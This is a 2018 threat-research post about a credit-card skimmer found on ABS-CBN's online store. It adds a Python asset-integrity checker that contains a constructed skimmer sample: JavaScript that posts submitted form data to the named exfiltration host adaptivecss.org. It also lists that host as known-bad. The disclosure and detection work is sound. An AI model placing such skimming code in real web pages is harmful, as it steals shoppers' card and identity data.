ABS-CBN next in series of high profile breaches
by Sansec Forensics Team
Published in Threat Research − September 18, 2018

*Image: ABS-CBN headquarters*
While Filipinos are recovering from typhoon Mangkhut, another misfortune awaits them online. We found that their broadcasting giant ABS-CBN, a $740 million conglomerate and top-500 global Internet destination, has been hacked. Criminals have been running a payment skimmer on ABS-CBN's online store since at least August 16th. Personal information and credit card details are intercepted while people shop for merchandise from one of its 90+ television shows. The stolen data is sent onwards to a server registered in Irkutsk, Russia. The credit cards and identities are then (presumably) sold on the black market.
ABS-CBN is the latest target in a series of high profile skimming operations. Previously, British Airways and Ticketmaster admitted massive theft of their customers' credit cards. The methodology found at these crime scenes is the same: browser-based interception during the checkout process. This method is quickly gaining popularity because it defeats the security of encrypted connections (HTTPS/SSL): the skimmer runs inside the shopper's browser and reads the form data before it is encrypted for transit.
Filipinos are advised to carefully check their credit card statements for unauthorized payments.
We have notified ABS-CBN of the breach, but have not received a response.
Technical details
Sansec discovered the fraud campaign with newly released malware detection heuristics. The (obfuscated) malware is located at store.abs-cbn.com/js/lib/ccard.js (archive.org). This specific file has not been modified in four weeks, suggesting the malware was injected on or before August 16th.
```
$ curl -v https://store.abs-cbn.com/js/lib/ccard.js
< Last-Modified: Thu, 16 Aug 2018 06:24:34 GMT
```
The malware sends its stolen data to a payment collection server called adaptivecss[.]org.
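The two observations above (a checkout script whose content changed on a date nobody deployed anything, and that script talking to an outside host) are exactly what a simple asset-integrity check would flag. The following is an added example written for this article, not Sansec's scanner or any ABS-CBN code: it hashes a JavaScript asset against a known-good baseline, undoes the common `'a'+'b'` string-splitting trick before extracting the hosts the script talks to, compares them against an allowlist, and reports how long the file has been unchanged according to its `Last-Modified` header. The allowlist, the baseline script and the tampered variant are all constructed for the example; only the file path, the exfiltration host and the header date come from the article.

```python
"""Added example: integrity and egress check for a store's JavaScript assets.

Checks demonstrated:
  1. hash drift: the SHA-256 of the served file no longer matches the baseline
     recorded from a known-good deployment;
  2. unexpected destinations: the script references a host that is not on the
     store's allowlist (or is a known skimmer host).
The Last-Modified header printed by `curl -v` is parsed to report the age of a
changed file. All sample data is constructed inline; nothing touches the network.
"""
import hashlib
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Hosts a checkout page may legitimately contact (assumed for the example).
ALLOWED_HOSTS = {"store.abs-cbn.com", "www.abs-cbn.com"}
# Exfiltration host named in the article (written defanged in the text).
KNOWN_BAD_HOSTS = {"adaptivecss.org"}

# Constructed stand-in for a clean ccard.js and its baseline hash.
BASELINE_CLEAN_JS = b"function formatCard(n){return n.replace(/\\s+/g,'');}\n"
BASELINE = {"/js/lib/ccard.js": hashlib.sha256(BASELINE_CLEAN_JS).hexdigest()}

# Constructed stand-in for the tampered file: the clean helper plus an appended
# sender that splits the host into string fragments and posts form data to it.
TAMPERED_JS = (
    BASELINE_CLEAN_JS
    + b"(function(){var h='https://'+'adaptivecss'+'.org/collect';"
    + b"document.addEventListener('submit',function(e){"
    + b"var fd=new FormData(e.target);fetch(h,{method:'POST',body:fd});});})();\n"
)

# Header value from the article's curl output, and the article's publish date.
LAST_MODIFIED_HEADER = "Thu, 16 Aug 2018 06:24:34 GMT"
SCAN_TIME = datetime(2018, 9, 18, 0, 0, tzinfo=timezone.utc)

_CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")
_HOST = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.IGNORECASE)


def normalize_js(js: str) -> str:
    """Join 'a'+'b' string concatenations so split-up hostnames become visible.
    This handles only that one trick; real obfuscation needs a real parser."""
    return _CONCAT.sub("", js)


def extract_hosts(js: str) -> set:
    """Return every host referenced in an http(s) URL after normalization."""
    return {m.group(1).lower() for m in _HOST.finditer(normalize_js(js))}


def header_age_days(last_modified: str, now: datetime) -> float:
    """Age of an asset in days, from its HTTP Last-Modified header."""
    return (now - parsedate_to_datetime(last_modified)).total_seconds() / 86400


def check_asset(path: str, content: bytes, last_modified: str = "",
                now: datetime = SCAN_TIME) -> list:
    """Run both checks on one asset and return human-readable findings."""
    findings = []
    digest = hashlib.sha256(content).hexdigest()
    expected = BASELINE.get(path)
    if expected is None:
        findings.append(f"{path}: no baseline hash recorded")
    elif digest != expected:
        age = (f", unchanged for {header_age_days(last_modified, now):.0f} days"
               if last_modified else "")
        findings.append(f"{path}: content hash drifted from baseline{age}")
    for host in sorted(extract_hosts(content.decode("utf-8", "replace"))):
        if host in KNOWN_BAD_HOSTS:
            findings.append(f"{path}: references known skimmer host {host}")
        elif host not in ALLOWED_HOSTS:
            findings.append(f"{path}: references non-allowlisted host {host}")
    return findings


if __name__ == "__main__":
    print("clean:", check_asset("/js/lib/ccard.js", BASELINE_CLEAN_JS))
    for line in check_asset("/js/lib/ccard.js", TAMPERED_JS, LAST_MODIFIED_HEADER):
        print("tampered:", line)
```

In practice the baseline hashes would be produced at deploy time and the check run against the live CDN on a schedule; a hash drift outside a deployment window, or any new external host in a checkout script, is worth paging on even before anyone looks at the code.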
![adaptivecss[.]org](/assets/posts/cache/d6084b1d7ef18872f5714cf41cf5f236.png)
This server is on the same Russian network as coffemokko.com, a different malware campaign that we discovered earlier this week:
> Just discovered the curiously named "Coffe&Tea" malware campaign. CC servers at https://t.co/pS6O7mXCbm, https://t.co/7i8JqZcNXf, https://t.co/yCiImbSyfY. They have open dirs so you can list the fake payment popups per victim. Do you recognize any of them? pic.twitter.com/TFIr4qrHjm
>
> — Willem de Groot (@gwillem) September 13, 2018